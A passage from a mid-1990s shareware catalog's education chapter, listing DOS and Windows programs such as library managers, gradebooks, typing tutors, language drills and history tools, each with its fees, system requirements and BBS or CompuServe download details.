systems, Library. + + Product: BIBLOGIC + Bibliographic reference database manager. See full description + on page 246. + + Chapter 13, "Education" 521 + + + + Product: Book Librarian + Author: TurboSystemsCo, 404-516-8575 + Version: 1.53 (12-26-93) + Needs: IBM PC, DOS 2.11 or better. 512k RAM. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $34.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, GEnie, + mail support; discounts on other products. + Look for: BL153.ZIP on BBSs (call 703-680-9269 to download it at + no charge); BL.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); BL153.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 223k (about 17 minutes with a 2400 baud modem) + Description: + Powerful easy-to-use menu-driven program to organize and manage + a personal, club, corporate, church or school library. Features + context sensitive help, browse and find windows. Each record + stores title, author, subject, book type, catalog # and much + more. Full featured reporting with numerous reports to the + screen, printer or disk. + + + Product: Grow'Em + Grow from seed/cuttings. Easy, slick, great. See full + description on page 604. + + Product: Private Library + Put your own books, tapes, etc. online. See full description + on page 618. + + Chapter 13, "Education" 522 + + + + Product: Public Library + Author: My Little Realm Enterprises, 201-529-8318 + Version: 3.2 (04-12-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support. 3-month + return policy. 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MLRPUB30.ZIP on BBSs; MLRPUB.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (or contact userID 70761,2175 for + assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Tired of paying overdue fines at your local library? This + reminds you of the due dates of everything you take out of your + public library. It also keeps the returned books in a + historical file that you can search, sort and print, which is a + great help to high school and college kids doing research + papers. + + + Product: REFILE + Author: MegAS Corporation, 317-844-6380 + Version: 3.1 (04-17-94) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor; Dual + 720k floppy drives; Hard disk; HP LaserJet printer; Mouse; + Epson printer. + Strongly recommended: VGA monitor. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + 1-month limited return policy; discounts on upgrades. + Look for: availability unknown on BBSs; REFILE.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 7 (or contact userID 73770,3076 for + assistance). + SWREG#: 1768 + Download size: 172k (about 13 minutes with a 2400 baud modem) + Description: + One component of a document management system for the filing + and retrieval of journal or periodical articles. A browse + feature for authors, sources, keywords, and document folders + simplifies data entry and searches. It assigns and manages all + document identification and will print index cards or labels. + Formatted bibliographies may be produced with a companion + product. + + Chapter 13, "Education" 523 + + + + Product: RMS-III: Ref.Mgn.Sys. + Menu based biblio/reference system. See full description on + page 246. + + Product: ScrollZ + For your periodicals, books, papers & comics. See full + description on page 591. + + Product: Visual Computer Dictionary Plus + Graphically portrays computer definitions. See full + description on page 529. + + + 13.7 Teachers + + Product: BTS-Equalizer + Tutor and study aid, question file exchange. See full + description on page 515. + + Product: CPR ByStander Review + Electronic review of bystander CPR. See full description on + page 541. + + Product: Crossword Clipper for DOS + Crossword puzzle layout/publishing tool. See full description + on page 236. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 236. + + Product: Crossword Creator + Author: PC HELP-LINE, 909-797-3091 + Version: 6.00 (04-15-94) + Needs: IBM PC, DOS 5.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 1-month return policy; bonus utilities; discounts on + other products. 3-month free upgrading allowed. Word lists; + Crossword Clipper publishing utility. + Look for: CWC600.ZIP on BBSs; CWC.ZIP on CompuServe in CIS:IBMNEW + forum LIBrary 8 (or contact userID 72357,3523 for assistance). + SWREG#: 95 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + A great tool for teachers and trainers, great fun for students + and trainees. This crossword puzzle "editor" provides all the + tools you need to quickly design and print your own crosswords. + + Chapter 13, "Education" 524 + + + + Pull-down menus, mouse support, comprehensive on-line help. Can + generate freeform puzzles from a word list or ASCII file. + Works with a companion program, Crossword Clipper, to produce + .PCX and .BMP graphic files for use in word-processors or + graphics applications. Spanish, French, and German versions + available. + + + Product: LessonPlanZ + Author: Unicorn Software Limited, 816-429-3558 + Version: 2.60 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $31.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: LPLNZ260.ZIP on BBSs (call 317-784-2147 to download it + at no charge); LPLANZ.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 70272,3317 for assistance). + SWREG#: 69 + Download size: 253k (about 19 minutes with a 2400 baud modem) + Description: + Lesson planning made easy! Has separate areas for goals, + objectives, methods, evaluations, and materials. Each area can + be from 1 to 5000 lines long! Header information holds title, + dates covered, number of days, subject and more. Default + settings for school and teacher name. Prints a variety of + reports including a basic lesson plan, separate areas, a custom + listing, and folder labels to hold your plans! Uses common WP + commands, menu driven, mousable, and on line help. + + + Product: LVN/Vocational Review Program + Medical-surgical home study review course. See full + description on page 542. + + Product: THE MAGIC OF THE MIND + Contentious philosophy of human behavior. See full description + on page 662. + + Product: A MUSICAL TUTORIAL + An excellent way to promote musical study. See full + description on page 542. + + Chapter 13, "Education" 525 + + + + Product: A MUSICAL TUTORIAL for Windows + An excellent way to promote musical study. See full + description on page 543. + + Product: Q&A Study Aid [***] + Comprehensive computer testing/grading system. See full + description on page 376. + + Product: TRAINER + Author: Nine-Patch Software, 816-582-8589 + Version: 1.4 (08-20-93) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $19.95 + Registration benefits: 12 months of phone, CompuServe, mail + support. 1 free update disk(s) sent out. + Look for: NPTR14.ZIP on BBSs; NPTR14.* on CompuServe in + CIS:EDFORUM forum LIBrary 1 (or contact userID 71222,3565 for + assistance). + Download size: 162k (about twelve minutes with a 2400 baud modem) + Description: + Trains passive pupils to become self-correcting scholars. + Scores 20-200+ tests by quality and quantity. Rewards self- + judgment and the sense of responsibility needed to learn at + higher levels of thinking. Allows students to report what they + know or can do. No need to pre-guess question difficulty. + Norm- and criterion-referenced conversion of scores to grades. + Instructions and sample data are built in. + + + Product: You're Hired! + A realistic job interview simulator. See full description on + page 379. + + Chapter 13, "Education" 526 + + + + 13.7.1 Gradebooks + + Product: GradeBook for Windows + Author: R&R EdWare, 517-727-2066 + Version: 3.06 (01-24-95) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; CGA + monitor; Hercules monitor; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Postscript printer; Mouse; Epson printer. + Registration fee: $34.00 (add $3.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; bonus utilities; bonus + templates; discounts on other products; discounts on upgrades. + Look for: GB306.ZIP on BBSs (call 317-856-2087 to download it at + no charge); GB306.EXE on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 70150,323 for assistance). + SWREG#: 685 + PsL#: 10763 + Download size: 830k (about 62 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + A Windows based teacher's gradebook with extensive online help. + Terms, tasks & grades may be customized. Allows multiple + periods per term, score transfers, curving, teacher notes, not + counted scores, user defined categories, ID#'s, tot points or + category weights, discard worst "n" scores per category, extra + credit options, multiple class score & grade distribution + statistics with charts, progress reports, imp/exp, clipbd & + font support, interim weights, attendance, Word & Excel macros, + much more. + + + Product: VAR Grade + Author: VARed Software, 805-523-7546 + Version: 6.00 (04-30-93) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; CGA monitor. + Strongly recommended: Dual 720k floppy drives; Hard disk. + Registration fee: $50.00 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; site license. 3-month free upgrading allowed. + Look for: VARGRA.ZIP on BBSs; VARGRA.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 1 (or contact userID 73427,112 for + assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Description: + A full-featured program for recording, plotting, and analyzing + grades and attendance. You can have any number of students, + assignments, sections, database items, or classes. It can + handle number grades, letters, or extra credit. It can sum, + + Chapter 13, "Education" 527 + + + + average, discard, and weight scores. A wide variety of + statistical tests and plots can be done on your grades. You + can do seating charts, what-ifs, sort students, import/export + grades, and define your own grading systems. The program is + extremely flexible. + + + 13.8 Computers + + See also: Computer programming, Tutorials; Home & hobby, + Computers; Business, Training & support aids. + + Product: Basic Training + BASIC language tutorial. See full description on page 483. + + Product: CD-ROM Guide + Directory of DOS & Windows CD-ROM Titles. See full description + on page 585. + + Product: Computer Dictionary + Author: Gary FitzGerald, 914-357-4171 + Version: 1.20 (12-29-94) + Needs: IBM AT (80286), Windows 3.1 or better. Windows 3.1. + Strongly recommended: VGA monitor. + Registration fee: $5.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: CDICT.ZIP on BBSs. + Download size: 255k (about 19 minutes with a 2400 baud modem) + Description: + An on-line dictionary of computer terms written for absolute + beginners and it is also a reference for everyone else. + Contains over 1001 computer terms that every computer user + should know. When placed in the Start Up Group of Windows 3.1, + it would be available for reference at any time from the CTRL + ESC task list or by using ALT TAB. + + + Product: Q&A Study Aid [***] + Comprehensive computer testing/grading system. See full + description on page 376. + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 204. + + Chapter 13, "Education" 528 + + + + 13.8.1 Computer hardware tutors + + Product: Visual Computer Dictionary Plus + Author: BlueStar Software + Version: 2.0 (05-10-95) + Needs: IBM AT (80286), DOS 3.3 or better. 450k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: XMS memory. + Registration fee: $39.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of CompuServe, mail support; discounts on + upgrades. + Look for: availability unknown on BBSs. + Download size: 2800k (about 208 minutes with a 2400 baud modem) + Description: + Designed to graphically portray computer definitions in an + attractive and comprehensive way. It will appeal to anybody who + owns a computer and would like to be informed about computer + definitions, computer related terms, DOS commands, symbols and + acronyms. Developed for IBM PC and compatible computers, + program runs in a DOS environment. Defines terms on a wide + variety of topics with over 1100 definitions. + + + 13.8.2 Operating system tutors + + Product: DOS Summary + Author: Computer Knowledge + Version: 1.01 (02-23-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $0.00 + Registration benefits: Support. + Look for: DOSSUM.ZIP on BBSs; DSUM01.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 1 (or contact userID 75655,210 for + assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A DOS command summary program. When started from DOS you have + the option of accessing either an alphabetical menu of DOS + commands or a menu where commands are grouped by function. A + second way of accessing a command is by starting the program + with a command name as a parameter. Finds the closest match to + the command you entered - so exact spelling is not necessary. + Only DOS commands are in this version; batch commands and + CONFIG.SYS commands are not. DOS versions to 4.01 supported. + + Chapter 13, "Education" 529 + + + + Product: DOS Summary (Hypertext) + Author: Computer Knowledge + Version: 2.0 (02-15-92) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $25.00 + Registration benefits: Printed manual with command examples not + found in the software, master disks, bonus utilities. + Shareware disks of other products. + Look for: DOSSUM20.ZIP on BBSs; DSUM02.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 1 (or contact userID 75655,210 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + DOS Summary is a hypertext tutorial and reference product which + covers all DOS commands and drivers through MS-DOS 5.0. Also + added are tutorials covering memory management and how DOS + starts. The program can be used in standalone or resident mode. + When started, you have the option of an alphabetical command + menu or a menu where commands are grouped by function. You may + also start the program with a DOS command name as a parameter + and be taken immediately to that command. + + + Product: TOP + Ultimate DOS command enhancement utility. See full description + on page 122. + + Product: TUTOR.COM + Author: Computer Knowledge + Version: 4.5 (05-01-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $15.00 + Registration benefits: Printed manual, master disks. + Look for: TUTCOM.ZIP on BBSs; TUTCOM.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 11 (or contact userID 75655,210 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Awards & nominations: 1992 finalist, Shareware Industry Awards. + Description: + A minicourse in microcomputing covering the basics of a variety + of topics including: Computer History, Introduction to DOS, + Computer Terminology, Subdirectories, Hardware, Batch Files, + the Keyboard, and Introduction to Programming. Material is + presented in a series of screens and the user has the ability + to move forward or backward through the tutorials, or jump to + selected locations using a menu. Short quizzes test you on your + knowledge but you may bypass these when reviewing. + + Chapter 13, "Education" 530 + + + + 13.8.3 Typing tutors + + Product: Touch Type Tutor for Windows + Author: Gray Design Associates + Version: 1.0 (09-01-92) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 + Registration benefits: Bonus sentences. + Look for: availability unknown on BBSs; TTTWIN.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 73607,2105 + for assistance). + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + Super easy-to-use for Windows 3.x. Whether you want to rate a + professional typist's speed or learn to touch type from + scratch, this program has it all! Intelligently customizes to + learner's skill level, ensuring the fastest learning curve. + Suitable for individual use, for teachers and for employers. + + + 13.8.4 Educational computer games + + See also: Games. + + Product: Mouse Math [***] + Author: Hufnagel Software, 814-226-5600 + Version: 1.0 (08-15-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: SVGA monitor; sound card. + Registration fee: $20.00 (add $10.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited phone, CompuServe, mail support; + bonus data; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 2200k (about 163 minutes with a 2400 baud modem) + Description: + A verbal mathematics drill program for Windows that gradually + uncovers whimsical photographs as answers to spoken basic math + problems are clicked with a mouse. Setup options allow you to + select problem ranges appropriate for young children, teens and + adults. + + Chapter 13, "Education" 531 + + + + Product: Personal Challenge [***] + Author: R.K. West Consulting + Version: 1.1 (10-04-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM. + Strongly recommended: Hard disk; HP LaserJet printer; Epson + printer. + Registration fee: $15.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + bonus utilities; bonus data; discounts on upgrades. + Look for: CHALL11.ZIP on BBSs; CHALL.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10541 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Play different educational and trivia games to test your + knowledge in a variety of categories as you compete against + yourself or others. Your choice of Beginner, Intermediate or + Expert determines how fast you play and how many points you can + earn. Winners earn Honorary Degrees and a chance for fame on + the High Scorers list. + + + Product: Z & Z Color [***] + Color-by-number for ages 3 and up. See full description on + page 501. + + Product: Z & Z Puzzle [***] + Windows combination jigsaw/slider puzzle. See full description + on page 513. + + + 13.9 Foreign language + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 523. + + Chapter 13, "Education" 532 + + + + Product: GAKUSEI + Author: Barham Software, 310-327-4862 + Version: 1.1.3 (06-12-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; EGA monitor; Hard + disk. + Strongly recommended: HP LaserJet printer; Epson printer. HP + LJII or Epson LQ with 32K. + Registration fee: $55.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited + tollfree 800# phone, CompuServe, mail support; bonus data; + discounts on upgrades. + Look for: availability unknown on BBSs; GAK11*.EXE on CompuServe + in CIS:FLEFO forum LIBrary 7 (multiple files) (or contact + userID 70700,2225 for assistance); GAK*.* on GEnie in EDUCATION + forum LIBrary 0 (multiple files). + PsL#: 11283 + Download size: 1500k (about 112 minutes with a 2400 baud modem) + Description: + An elementary Japanese grammar tutorial. Lessons include: an + introduction to kana; onomatopoeia; DESU copula; ARIMASU/IMASU + verbs of existence; WA, GA, E, O, DE, and NI relationals; + dictionary and -MASU verb forms; NA adjectives; and more. + + + Product: Hebrew Edit + Hebrew text editor with vowels. See full description on + page 232. + + Product: KAPIAN : Chinese Flash Cards + Author: Selfhelp Software, 916-927-2602 + Version: 1.1 (02-02-92) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; CGA monitor. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $11.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 51/4" master disk(s); + lifetime unlimited phone, newsletter, mail support; all ASP- + wide offers (see page 6). + Look for: availability unknown on BBSs; KAPIAN.ZIP on CompuServe + in CIS:FLEFO forum LIBrary 7 (or contact userID 70724,2276 for + assistance); KAPIAN.ZIP on GEnie in QMODEM forum LIBrary 1. + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Multiple choice test of Chinese that runs in 10 modes: + v/ 1-2 given long or short form characters select + romanization + v/ 3-4 Given long or short form characters select English + v/ 5-6-7 Given English select long or short form characters + or romanization + v/ 8-9-10 Given romanization slection long or short form + characters or English + + Chapter 13, "Education" 533 + + + + Utilities are encluded to make characters and lessons. + Characters are drawn on screen by stroke order. + + + Product: LinguaPro/SPANISH + Author: Schulenberg and Associates, Inc., 713-440-4444 + Version: 2.50 (09-06-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: EGA monitor. + Registration fee: $39.95 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; all ASP-wide + offers (see page 6); discounts on other products. Bonus + courses; bonus vocabulary; complete verb reference. + Look for: availability unknown on BBSs; LPROSP.EXE on CompuServe + in CIS:FLEFO forum LIBrary 1 (or contact userID 72650,3160 for + assistance); LPRSP250.EXE on GEnie in EDUCATION forum LIBrary 2 + (or contact userID C.SCHULENBER for assistance). + PsL#: 10875 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Implements Units 1-18 of the FSI Basic Spanish Course + (including grammar tutorials), Units 1-12 consist of a + conversational course in the Castilian dialect, a 19,000-word + user-modifiable online dictionary, a flashcarding system for + mastery of this graded 5-level vocabulary, a unique verb + conjugation system that drills verbs in all tenses/persons + using millions of complete sentences, and a verb reference with + definitions and conjugations of over 9200 verbs, including + idiomatic usages. + + + Product: PHRASE.ZIP + Combo hangman & wheel of fortune. New concept. See full + description on page 706. + + Product: Scholar Utilities + Aids writers of scholarly papers. See full description on + page 549. + + Chapter 13, "Education" 534 + + + + Product: SPANISH DRILL! + Author: LONE WOLF ENTERPRISES + Version: 1.8 (11-09-93) + Needs: IBM PC, DOS 4.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk. + Registration fee: $5.00 (add $2.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 6 months of phone, + CompuServe, mail support; 3-month return policy; all ASP-wide + offers (see page 6); discounts on other products. 2-month free + upgrading allowed. + Look for: SPAN1.ZIP on BBSs; SPAN1.ZIP on CompuServe in CIS:LIB + forum LIBrary 0 (or contact userID 73353,121 for assistance); + SPAN1.ZIP on GEnie in GE forum LIBrary 0. + Download size: 46k (about four minutes with a 2400 baud modem) + Description: + Spanish vocabulary flash card program that has a practice mode + for learning new Spanish words and an exam mode to test and + score you on what you have learned. Requires you to type the + correct Spanish letters, such as accents and tildes! Fun, + inexpensive and easy way to develop your basic Spanish + vocabulary. Start with nouns, adjectives, and verbs, then work + your way up to verb conjugation, common phrases and full + sentences! + + + Product: Spanish Helper Level One + Author: G.B. Blanchard, 212-598-4939 + Version: 1.3 (04-16-95) + Needs: IBM PC, DOS 3.3 or better. 200k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk. + Strongly recommended: CD-ROM drive. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, BBS, CompuServe, mail support; 3-month + return policy; bonus utilities; all ASP-wide offers (see + page 6). Program with Spanish jokes with option to see + translations. + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + An excellent interactive program to learn Spanish. Its + interactive quizzing system allows you to learn vocabulary + rapidly. Contains a large database of vocabulary and allows you + to make your own lists to quiz yourself. Its well-planned + design makes it the perfect program for individuals or schools. + + Chapter 13, "Education" 535 + + + + Product: WRITE CHINESE + Author: Awareness Productions, 214-517-0279 + Version: 1.00 (05-18-94) + Needs: IBM AT (80286), DOS 3.0 or better. 512k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $29.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; 1-month return policy; bonus + data; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: CHINA100.ZIP on BBSs (call 214-690-2168 to download it + at no charge). + Download size: 143k (about eleven minutes with a 2400 baud modem) + Description: + This program teaches basic Chinese calligraphy. Focuses on the + 150 most frequently encountered characters which constitute + approximately 1/3 of all printed materials. The student + practices calligraphy by drawing characters on simulated "nine- + square box" paper. Evaluates each character as it is being + drawn, providing continuous feedback and positive + reinforcement. Also has quiz options to teach character + meanings and Mandarin/Cantonese transliterations. + + + 13.10 Geography + + See also: Graphics. + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 505. + + Product: Landscape Explorer + 3D landscape visualization tool. See full description on + page 573. + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 573. + + Chapter 13, "Education" 536 + + + + Product: U.S. Geography Tutor + Author: On-Target Software, 415-474-9973 + Version: 1.0 (04-01-94) + Needs: IBM PC, Windows 3.0 or better. 256k RAM. + Registration fee: $20.00 + Registration benefits: 31/2" master disk(s); 3 months of + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 6). 1-month free upgrading allowed. Bonus + geography-related book. + Look for: availability unknown on BBSs; GEOUSA.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0 (or contact userID 72557,3003 + for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + A Windows program intended for grade school children. It tests/ + teaches you U.S. geography in an entirely visual way. Learn + about state locations, capital cities, lakes and rivers, simply + by clicking the mouse. + + + Product: VERSAMAP + Draws outline maps on 13 map projections. See full description + on page 574. + + + 13.11 History + + Product: Bible Timeline + Interactive Bible timelines. See full description on page 657. + + Product: CHRONOS + Author: Cascoly Software, 206-523-6135 + Version: 2.18 (01-10-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor; Dual 720k floppy drives; HP DeskJet + printer; HP LaserJet printer. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of CompuServe, mail support; bonus utilities; disks of + other shareware; discounts on other products. + Look for: availability unknown on BBSs; CHRNOS.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 11 (or contact userID 76703,3046 + for assistance). + SWREG#: 381 + Download size: 132k (about ten minutes with a 2400 baud modem) + Description: + How old was Paul Revere when he rode into history? How many + years separated Michelangelo and Cortez? This program lets you + sort and select by individual people and events, or groups and + factions, to develop new insights and trace patterns across + different eras and cultures. Useful to history and art + students, teachers, genealogists, lawyers, writers or anyone + + Chapter 13, "Education" 537 + + + + interested in exploring historical relations or cultural + events. Prints wall charts. Also includes an automatic trivia + game generator + + + Product: CHRONOS:Windows in Time + Author: Cascoly Software, 206-523-6135 + Version: 1.01 (09-28-94) + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus data; bonus + graphics; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; WIT.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 18 (or contact userID 76703,3046 for + assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + How old was Paul Revere when he rode into history? This lets + you sort and selects individual people and events, or groups + and factions, to develop new insights and trace patterns + across different eras and cultures. You can modify or expand + any of the datasets. Used by history & art students, teachers, + genealogists, lawyers, writers or anyone interested in + exploring historical relations or cultural events. + + + Product: CNA/NURSE ASSISTANT REVIEW + Evaluation review testing program. See full description on + page 541. + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 505. + + Product: DayMaster + A day in history & reminder system. See full description on + page 169. + + Product: On This Day + Author: The Software Construction Co., 508-851-6204 + Version: 2.0 (07-30-94) + Needs: IBM PC, DOS 2.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Hard disk. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; disks of + + Chapter 13, "Education" 538 + + + + other shareware; discounts on other products. 3-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: OTD_20.ZIP on BBSs (call 508-454-3864 to download it at + no charge); OTD.ZIP on CompuServe in CIS:IBMSYS forum LIBrary 7 + (or contact userID 70313,3615 for assistance); OTD_20.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID W.GEISER for + assistance). + SWREG#: 2074 + PsL#: 10654 + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + This event DB and printing program accepts the date in which + you are interested and it prints the events that happened on + that day in history: + * Astronomical events (moon phases, solstices, etc) + * Birthdays of famous people + * Religious holidays (Jewish, Christian, etc) + * Much more + Uses text file databases, meaning you can edit them with your + favorite text editor (though they can be read in compressed + form). A personal events file is also supported. + + + Product: On This Day for Windows + Author: The Software Construction Co., 508-851-6204 + Version: 2.0 (07-30-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; disks of + other shareware; discounts on other products. 3-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: WOTD_20.ZIP on BBSs (call 508-454-3864 to download it + at no charge); WOTD.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 70313,3615 for assistance); + WOTD_20.ZIP on GEnie in WINDOWS forum LIBrary 76 (or contact + userID W.GEISER for assistance). + SWREG#: 2093 + PsL#: 10654 + Download size: 164k (about twelve minutes with a 2400 baud modem) + Description: + This event DB and printing program accepts the date in which + you are interested and it prints the events that happened on + that day in history: + * Astronomical events (moon phases, solstices, etc) + * Birthdays of famous people + * Religious holidays (Jewish, Christian, etc) + * Much more + Uses text file databases, meaning you can edit them with your + favorite text editor (though they can be read in compressed + form). A personal events file is also supported. + + Chapter 13, "Education" 539 + + + + 13.12 Literature + + Product: CNA/NURSE ASSISTANT REVIEW + Author: PC-DSD, 800-427-8123 + Version: 3.O (03-12-93) + Needs: IBM PC, DOS 2.0 or better. + 